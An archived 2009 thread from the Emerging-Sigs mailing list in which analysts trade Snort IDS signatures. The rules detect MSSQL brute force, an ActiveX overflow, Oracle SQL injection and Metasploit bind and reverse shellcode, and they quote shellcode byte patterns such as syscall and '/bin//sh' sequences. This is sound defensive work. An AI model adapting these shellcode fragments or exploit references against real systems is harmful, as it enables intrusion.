From bschnzl at cotse.net  Tue Dec  1 01:46:37 2009
From: bschnzl at cotse.net (Bill Scherr IV)
Date: Tue, 01 Dec 2009 01:46:37 -0500
Subject: [Emerging-Sigs] MSSQL False Neg
Message-ID: <MTAwMDAwOC5ic2Nobnps.1259649999@quikprotect>

Folks...

   Snort has a sig that should fire on these packets (IMHO).  The packet indicates the distance of the 
username (offset 0x0066) from the TDS Login data of the packet (beginning at offset 0x003e).  There 
are lots of length indicators, but they all start from 0x003e.  The byte_jump starts from the beginning of 
data (offset 0x0036), if I read right.  I am thinking /content:"s|00|a|00|"; within:8; distance:8;/

   I am using the reference @ http://www.freetds.org/tds.html#login7

   The threshold was met, several times over, but nothing fired!  Am I on track here?

-------  Data  -------

Original Sig (False Neg?)

alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 1433 (msg:"SQL SA brute force login attempt TDS 
v7/8"; flow:to_server,established; content:"|10|"; depth:1; content:"|00 00|"; depth:2; offset:34; 
content:"|00 00 00 00|"; depth:4; offset:64; pcre:"/^.{12}(\x00|\x01)\x00\x00(\x70|\x71)/smi"; 
byte_jump:2,48,little,from_beginning; content:"s|00|a|00|"; within:4; distance:8; nocase; threshold:type 
threshold, track by_src, count 5, seconds 2; reference:bugtraq,4797; reference:cve,2000-1209; 
reference:nessus,10673; classtype:suspicious-login; sid:3543; rev:4;)

Typical Packet (82 each, this event):

0000  00 14 bf 52 fe 40 00 d0  2b 77 75 01 08 00 45 20   ...R. at .. +wu...E
0010  00 bc 1e 56 40 00 6c 06  xx xx 79 0b 50 ce xx xx   ...V at .l. xxy.P.xx
0020  xx 7a 08 2b 05 99 a4 51  cc 4d b1 be 2b 43 50 18   xz.+...Q .M..+CP.
0030  ff ff 3d 81 00 00 10 01  00 94 00 00 01 00 8c 00   ..=..... ........
0040  00 00 01 00 00 71 00 00  00 00 00 00 00 07 d0 19   .....q.. ........
0050  00 00 00 00 00 00 e0 03  00 00 20 fe ff ff 04 08   ........ .. .....
0060  00 00 56 00 06 00 62 00  02 00 66 00 01 00 68 00   ..V...b. ..f...h.
0070  00 00 68 00 0e 00 00 00  00 00 84 00 04 00 8c 00   ..h..... ........
0080  00 00 8c 00 00 00 00 1c  25 5b 6f ff 00 00 00 00   ........ %[o.....
0090  8c 00 00 00 44 00 57 00  44 00 57 00 34 00 44 00   ....D.W. D.W.4.D.
00a0  73 00 61 00 b3 a5 xx 00  xx 00 2e 00 xx 00 xx 00   s.a...x. x...x.x.
00b0  xx 00 2e 00 xx 00 xx 00  xx 00 2e 00 31 00 32 00   x...x.x. x...1.2.
00c0  32 00 4f 00 44 00 42 00  43 00                     2.O.D.B. C. 

-------  End Data  -------


Bill Scherr IV, GSEC, GCIA
Principal Security Engineer
EWA Information and Infrastructure Technologies
bscherr at iit-tek.com
bscherr at ewa.com
703-478-7608


From jason.weir at nhrs.org  Tue Dec  1 07:14:51 2009
From: jason.weir at nhrs.org (Weir, Jason)
Date: Tue, 1 Dec 2009 07:14:51 -0500
Subject: [Emerging-Sigs] More external SMTP bad attachments
Message-ID: <F236CDCE34685A458D315422458642E201D307CC@pine.nhrs.org>

Started seeing these last night..

WU_Details_39018.zip
WU_Details_39018.zip
WU_Details_de87b.zip

-J


_____________________________________________________________________________________________

Please visit www.nhrs.org to subscribe to NHRS email announcements and updates.

From kevross33 at googlemail.com  Tue Dec  1 07:28:02 2009
From: kevross33 at googlemail.com (Kevin Ross)
Date: Tue, 1 Dec 2009 12:28:02 +0000
Subject: [Emerging-Sigs] 3 sigs
Message-ID: <e75cc74a0912010428k7acf43e7yc3724560ee479e74@mail.gmail.com>

Here are 3 sigs for you. Also sig 2008357 (Amap Scannner Traffic Inbound)
can probably be removed or at least disabled now they have been replaced
with sigs 2010371 (Amap TCP Service Scan Detected) and 2010372 (Amap UDP
Service Scan Detected) which should be more accurate and better performance
wise than the old sig that I wrote (it was my very first snort sig so it
wasn't the best, I was just happy getting it working lol).

Kev

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET WEB_CLIENT
Haihaisoft Universal Player ActiveX Control URL Property Buffer Overflow
Attempt"; flow:established,to_client; content:"clsid"; nocase;
content:"1A01FF01-EA62-4702-B837-1E07158145FA"; nocase; distance:0;
content:"URL"; nocase;
pcre:"/<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*1A01FF01-EA62-4702-B837-1E07158145FA/si";
classtype:attempted-user; reference:url,
www.shinnai.net/exploits/ZzLsi6TIfSuVPh1kPHmP.txt; reference:url,
www.securityfocus.com/bid/37151/info; sid:14000001; rev:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET WEB_CLIENT
ACTIVEX Haihaisoft Universal Player ActiveX Control URL Property Buffer
Overflow Function Call Attempt"; flow:to_client,established;
content:"ActiveXObject"; nocase; content:"MYACTIVEX|2E|MyActiveXCtrl|2E|1";
nocase; distance:0; content:"URL"; nocase; classtype:attempted-user;
reference:url,www.shinnai.net/exploits/ZzLsi6TIfSuVPh1kPHmP.txt;
reference:url,www.securityfocus.com/bid/37151/info; sid:14000002; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $ORACLE_PORTS (msg:"ET EXPLOIT
Possible Oracle Database Text Component ctxsys.drvxtabc.create_tables Remote
SQL Injection Attempt"; flow:established,to_server;
content:"ctxsys|2E|drvxtabc|2E|create|5F|tables"; nocase;
content:"dbms|5F|sql|2E|execute"; nocase; distance:0;
pcre:"/ctxsys\x2Edrvxtabc\x2Ecreate\x5Ftables.+(SELECT|DELETE|CREATE|INSERT|UPDATE|OUTFILE)/si";
classtype:attempted-admin; reference:url,www.securityfocus.com/bid/36748;
reference:cve,2009-1991; sid:14000003; rev:1;)
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091201/2aadffc9/attachment.html

From albertogdedios at andaluciajunta.es  Tue Dec  1 09:02:29 2009
From: albertogdedios at andaluciajunta.es (Alberto Garcia de Dios)
Date: Tue, 1 Dec 2009 15:02:29 +0100 (CET)
Subject: [Emerging-Sigs] jennylab.rules
In-Reply-To: <6116b9e20911301101n26d6b64bk8d71ce557ac8397d@mail.gmail.com>
References: <31941.10.160.5.68.1259605662.squirrel@correo.andaluciajunta.es>
	<4B140F94.6000604@packetmail.net>
	<BEC67188-494F-4BED-994D-7640414E2992@gmail.com>
	<6116b9e20911301101n26d6b64bk8d71ce557ac8397d@mail.gmail.com>
Message-ID: <51334.10.160.5.67.1259676149.squirrel@correo.andaluciajunta.es>

False positive reduced and add some references.

On shell detection with pcre not posible use flow, could be reverse or bind
shell.
Thank.



#
#
#####
# METASPLOIT SHELLCODE RULES
#####
#
#


#
# BSD METASPLOIT RULES
#


#### BSD BIND SHELL #######
# BSD Bind Shell - ENCODE: PexFnstenvSub
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|83 e9 ec d9 ee d9 74 24 f4 5b 81 73 13|";
classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666000; rev:5;)


# BSD Bind Shell - ENCODE: CountDown
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|6a 4d 59 e8 ff ff ff ff c1 5e 30 4c 0e|";
content:"|e2 fa 6b 63 5b 9d 57 6e 17 0a|"; classtype:shellcode-detect; nocase;
distance:1; flow:established,to_server; reference:url,www.metasploit.com;
sid:10666001; rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|82 ed 5f 4c 5d 52 43 78 03 d9 95 8f 84 49 4a 48 71
74 45 d3|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666002;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|9f 90 4b ef a3 76 76 74 97 36 e4 aa bc 46 2f 77 45
6a 69 63|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666003;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|64 65 f8 b6 7e 41 cc 6a 53 13 12 4d 57 28 6e 20 2a
2a cc a5|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666004;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|17 1c 1a 19 fb 77 80 ce|";
classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666005; rev:5;)


#BSD Bind Shell - ENCODE: Pex
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|c9 83 e9 ec e8 ff ff ff ff c0 5e 81 76 0e|";
classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666006; rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|83 ee fc e2 f4|"; classtype:shellcode-detect;
nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666007; rev:5;)


#BSD Bind Shell - ENCODE: None
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|6a 61 58 99 52 68 10 02|";
classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666008; rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|89 e1 52 42 52 42 52 6a 10 cd 80 99 93 51 53 52 6a
68 58 cd|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666009;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|80 b0 6a cd 80 52 53 52 b0 1e cd 80 97 6a 02 59 6a
5a 58 51|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666010;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|57 51 cd 80 49 79 f5 50 68 2f 2f 73 68 68 2f 62 69
6e 89 e3|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666011;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|50 54 53 53 b0 3b cd 80|";
classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666012; rev:5;)



#BSD Bind Shell - ENCODE: PexAlphaNum
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|eb 03 59 eb 05 e8 f8 ff ff ff 4f 49 49 49 49 49 49
51 5a 56|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666012;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|54 58 36 33 30 56 58 34 41 30 42 36 48 48 30 42 33
30 42 43|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666013;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|56 58 32 42 44 42 48 34 41 32 41 44 30 41 44 54 42
44 51 42|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666014;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|30 41 44 41 56 58 34 5a 38 42 44 4a 4f 4d 4c 36
41|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:1066615;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|41 4e 44 35 44 34 44|"; classtype:shellcode-detect;
nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666016; rev:5;)



#BSD Bind Shell - ENCODE: PexFstEnvMov
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|6a 14 59 d9 ee d9 74 24 f4 5b 81 73 13|";
classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666017; rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666018; rev:5;)


#BSD Bind Shell - ENCODE: JmpCallAditive
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|eb 0c 5e 56 31 1e ad 01 c3 85 c0 75 f7 c3 e8 ef ff
ff ff|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666019;
rev:5;)


#BSD Bind Shell - ENCODE: Alpha2
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|eb 03 59 eb 05 e8 f8 ff ff ff 49 49 49 49 49 49 49
49 49 49|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666020;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|41 42 32 42 41 32 41 41 30 41 41 58|";
classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666021; rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Bind shell"; content:"|49 72 4e 4e 69 6b 53|"; classtype:shellcode-detect;
nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666022; rev:5;)
#### EOF BSD BIND SHELL ######





### BSD REVERSE SHELL #######
#BSD Reverse Shell - ENCODE: PexFnstenvSub
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Reverse shell"; content:"|c9 83 e9 ef d9 ee d9 74 24 f4 5b 81 73 13|";
classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666023; rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Reverse shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666024; rev:5;)


#BSD Reverse Shell - ENCODE: Countdown
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Reverse shell"; content:"|6a 43 59 e8 ff ff ff ff c1 5e 30 4c 0e 07 e2 fa
6b 63 5b 9d|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666025;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Reverse shell"; content:"|9f f6 72 09 4b 4b 4d 8a 74 7d 78 ec a2 49 26 7c
96 7d 79 7e|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666026;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Reverse shell"; content:"|7b e6 ac 64 57 d9 60 59 1d 1c 47 5d 5e 18 5a 50
54 b2 df 6d|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666027;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Reverse shell"; content:"|57 44 55 4a 5b 62|"; classtype:shellcode-detect;
nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666028; rev:5;)



#BSD Reverse Shell - ENCODE: Pex
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Reverse shell"; content:"|c9 83 e9 ef e8 ff ff ff ff c0 5e 81 76 0e|";
classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666029; rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Reverse shell"; content:"|83 ee fc e2 f4|"; classtype:shellcode-detect;
nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666030; rev:5;)


#BSD Reverse Shell - ENCODE: None
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Reverse shell"; content:"|51 cd 80 49 79 f6 50 68 2f 2f 73 68 68 2f 62 69
6e 89 e3 50|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666031;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Reverse shell"; content:"|6a 61 58 99 52 42 52 42 52 68|";
classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666032; rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Reverse shell"; content:"|89 e1 6a 10 51 50 51 97 6a 62 58 cd 80 6a 02 59
b0 5a 51 57|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666033;
rev:5;)



#BSD Reverse Shell - ENCODE: PexAlphaNum
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Reverse shell"; content:"|44 32 4d 4c 42 48 4a 46 42 31 44 50 50 41 4e 4f
49 38 41 4e|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666034;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Reverse shell"; content:"|4c 36 42 41 41 35 42 45 41 35 47 59 4c 36 44 56
4a 35 4d 4c|"; classtype:shellcode-detect; sid:10666035; rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Reverse shell"; content:"|56 58 32 42 44 42 48 34 41 32 41 44 30 41 44 54
42 44 51 42|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666036;
rev:5;)



#BSD Reverse Shell - ENCODE: PexFnstenvMov
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Reverse shell"; content:"|6a 11 59 d9 ee d9 74 24 f4 5b 81 73 13|";
classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666037; rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Reverse shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666038; rev:5;)



#BSD Reverse Shell - ENCODE: JmpCallAditive
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Reverse shell"; content:"|eb 0c 5e 56 31 1e ad 01 c3 85 c0 75 f7 c3 e8 ef
ff ff ff|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666039;
rev:5;)



#BSD Reverse Shell - ENCODE: Alpha2
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Reverse shell"; content:"|49 49 49 49 49 49 49 51 5a 6a|";
classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666040; rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Reverse shell"; content:"|58 50 30 42 31 41 42 6b 42 41|";
classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666041; rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD Reverse shell"; content:"|32 41 41 30 41 41 58 50 38 42 42 75|";
classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
reference:url,www.metasploit.com; sid:10666042; rev:5;)
##### EOF BSD Reverse Shell#####




##### BSD SPARC Bind Shell #########
#BSD SPARC Bind Shell - ENCODE: SPARC
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD SPARC Bind shell"; content:"|20 bf ff ff 20 bf ff ff 7f ff ff ff ea 03 e0
20 aa 9d 40 11|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666043;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD SPARC Bind shell"; content:"|ea 23 e0 20 a2 04 40 15 81 db e0 20 12 bf ff
fb 9e 03 e0 04|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666044;
rev:5;)


#BSD SPARC Bind Shell - ENCODE: None
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD SPARC Bind shell"; content:"|e0 23 bf f0 c0 23 bf f4 92 23 a0 10 94 10 20
10 82 10 20 68|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666045;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD SPARC Bind shell"; content:"|91 d0 20 08 d0 03 bf f8 92 10 20 01 82 10 20
6a 91 d0 20 08|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666046;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD SPARC Bind shell"; content:"|d0 03 bf f8 92 1a 40 09 94 12 40 09 82 10 20
1e 91 d0 20 08|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666047;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD SPARC Bind shell"; content:"|23 0b dc da 90 23 a0 10 92 23 a0 08 e0 3b bf
f0 d0 23 bf f8|"; classtype:shellcode-detect; sid:10666048; rev:5;)
#### EOF BSD SPARC Bind Shell #########


### BSD SPARC Reverse Shell ########
#BSD SPARC Reverse Shell - ENCODE: None
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD SPARC Reverse shell"; content:"|9c 2b a0 07 94 1a c0 0b 92 10 20 01 90 10
20 02 82 10 20 61|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666049;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD SPARC Reverse shell"; content:"|91 d0 20 08 d0 23 bf f8 92 10 20 03 92 a2
60 01 82 10 20 5a|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666050;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD SPARC Reverse shell"; content:"|91 d0 20 08 12 bf ff fd d0 03 bf f8 21 3f
c0|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666051;
rev:5;)

#BSD SPARC Reverse Shell - ENCODE: SPARC
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD SPARC Reverse shell"; content:"|20 bf ff ff 20 bf ff ff 7f ff ff ff ea 03
e0 20 aa 9d 40 11|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666052;
rev:5;)
alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
BSD SPARC Reverse shell"; content:"|ea 23 e0 20 a2 04 40 15 81 db e0 20 12 bf
ff fb 9e 03 e0 04|"; classtype:shellcode-detect; nocase; distance:0;
flow:established,to_server; reference:url,www.metasploit.com; sid:10666053;
rev:5;)
#### EOF BSD SPARC Reverse Shell ####







#
### Shellcode develop patron by h0f JennyLab
# Alberto Garcia de Dios
# albertogdedios at andaluciajunta.es


# Alpha payload
alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Possible Alpha
shellcode"; content:"|49 49 49 49 49 49 49 49 49 49|";
classtype:shellcode-detect; flow:established,to_server; distance:0;
sid:10666054; rev:5; nocase;)




# Call payload label and pop next bytes.
  #jmp short loader
  #label:
  #      code here
  #loader:
  # call label <--- here
  # db '/bin/bash'
alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Possible Alpha
shellcode"; content:"|e8|"; content:"|ff ff ff|"; distance:1;
classtype:shellcode-detect; flow:established,to_server;
reference:url,www.jennylab.org/codes/SimplePrint.opcode; sid:10666055; rev:5;
nocase;)





# xor eax, eax | xor ebx, ebx
alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode xor detect";
content:"|31 c0 31 db|"; classtype:shellcode-detect;
flow:established,to_server;
reference:url,www.jennylab.org/codes/SimplePrint.opcode; sid:10666056; rev:5;
nocase;)



# mov al, 0x01 | int 0x80
alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode exit syscall";
content:"|b0 01 cd 80|"; classtype:shellcode-detect;
flow:established,to_server;
reference:url,www.jennylab.org/codes/MultiString.opcode; sid:10666057; rev:5;
nocase;)



# pop ebx on call returned and two interruptions in 60 bytes.
alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode ebx pop and
interrupt call"; content:"|5b|"; content:"|cd 80|"; content:"|cd 80|";
within:60; classtype:shellcode-detect; flow:established,to_server;
sid:10666058; rev:5;)


# pop ecx to use in interruption and before jmp to label data loader
# VMWare 2 server ( 8088 default port ) false positive.
alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode pop ecx and
call interrupt"; content:"|eb|"; content:"|59|"; content:"|cd 80|";
within:512; classtype:shellcode-detect; flow:established,to_server;
sid:10666059; rev:5;)


# three push ( bsd shellcodes use very match push ) | very much false positive
on ssh and other services. use !$SSH_PORT ( before define var ).
#alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode push";
content:"|68|"; content:"|68|"; content:"|68|"; content:"|68|"; within:12;
classtype:shellcode-detect; flow:established,to_server; sid:10666060; rev:5;)


# xor all regs
alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode xor all
registers"; content:"|31 c0|"; content:"|31 db|"; content:"|31 c9|";
content:"|31 d2|"; distance:1; classtype:shellcode-detect;
flow:established,to_server;
reference:url,www.jennylab.org/codes/SimplePrint.opcode; sid:10666061; rev:5;
nocase;)



#jmp out of seh win32 exploit \xEB\x06\x90\x90 | jmp +6 - nop - nop ( multiple
exploits use).
alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode jmp out of seh
win32 exploit."; content:"|eb 06 90 90|"; classtype:shellcode-detect;
flow:established,to_server; sid:10666062; rev:5;)


# movl $0x01, %al | int 0x91
alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode exit Solaris.";
content:"|b0 01 cd 91|"; classtype:shellcode-detect;
flow:established,to_server; sid:106669063; rev:5; nocase;)



#
# WINDOWS SHELL
#

# C:\masm32> or C:\>
# *:\*>
#alert tcp any any -> any any (msg:"ET Windows shell execution 001";
pcre:"/\w\:\x5c.*\x3c/"; sid:966600090; rev:1;)
# \w\:\\.*\>
alert tcp any any -> any any (msg:"ET Windows shell execution 001";
pcre:"/\w\:\\.*\>/"; sid:966600090; rev:1;)


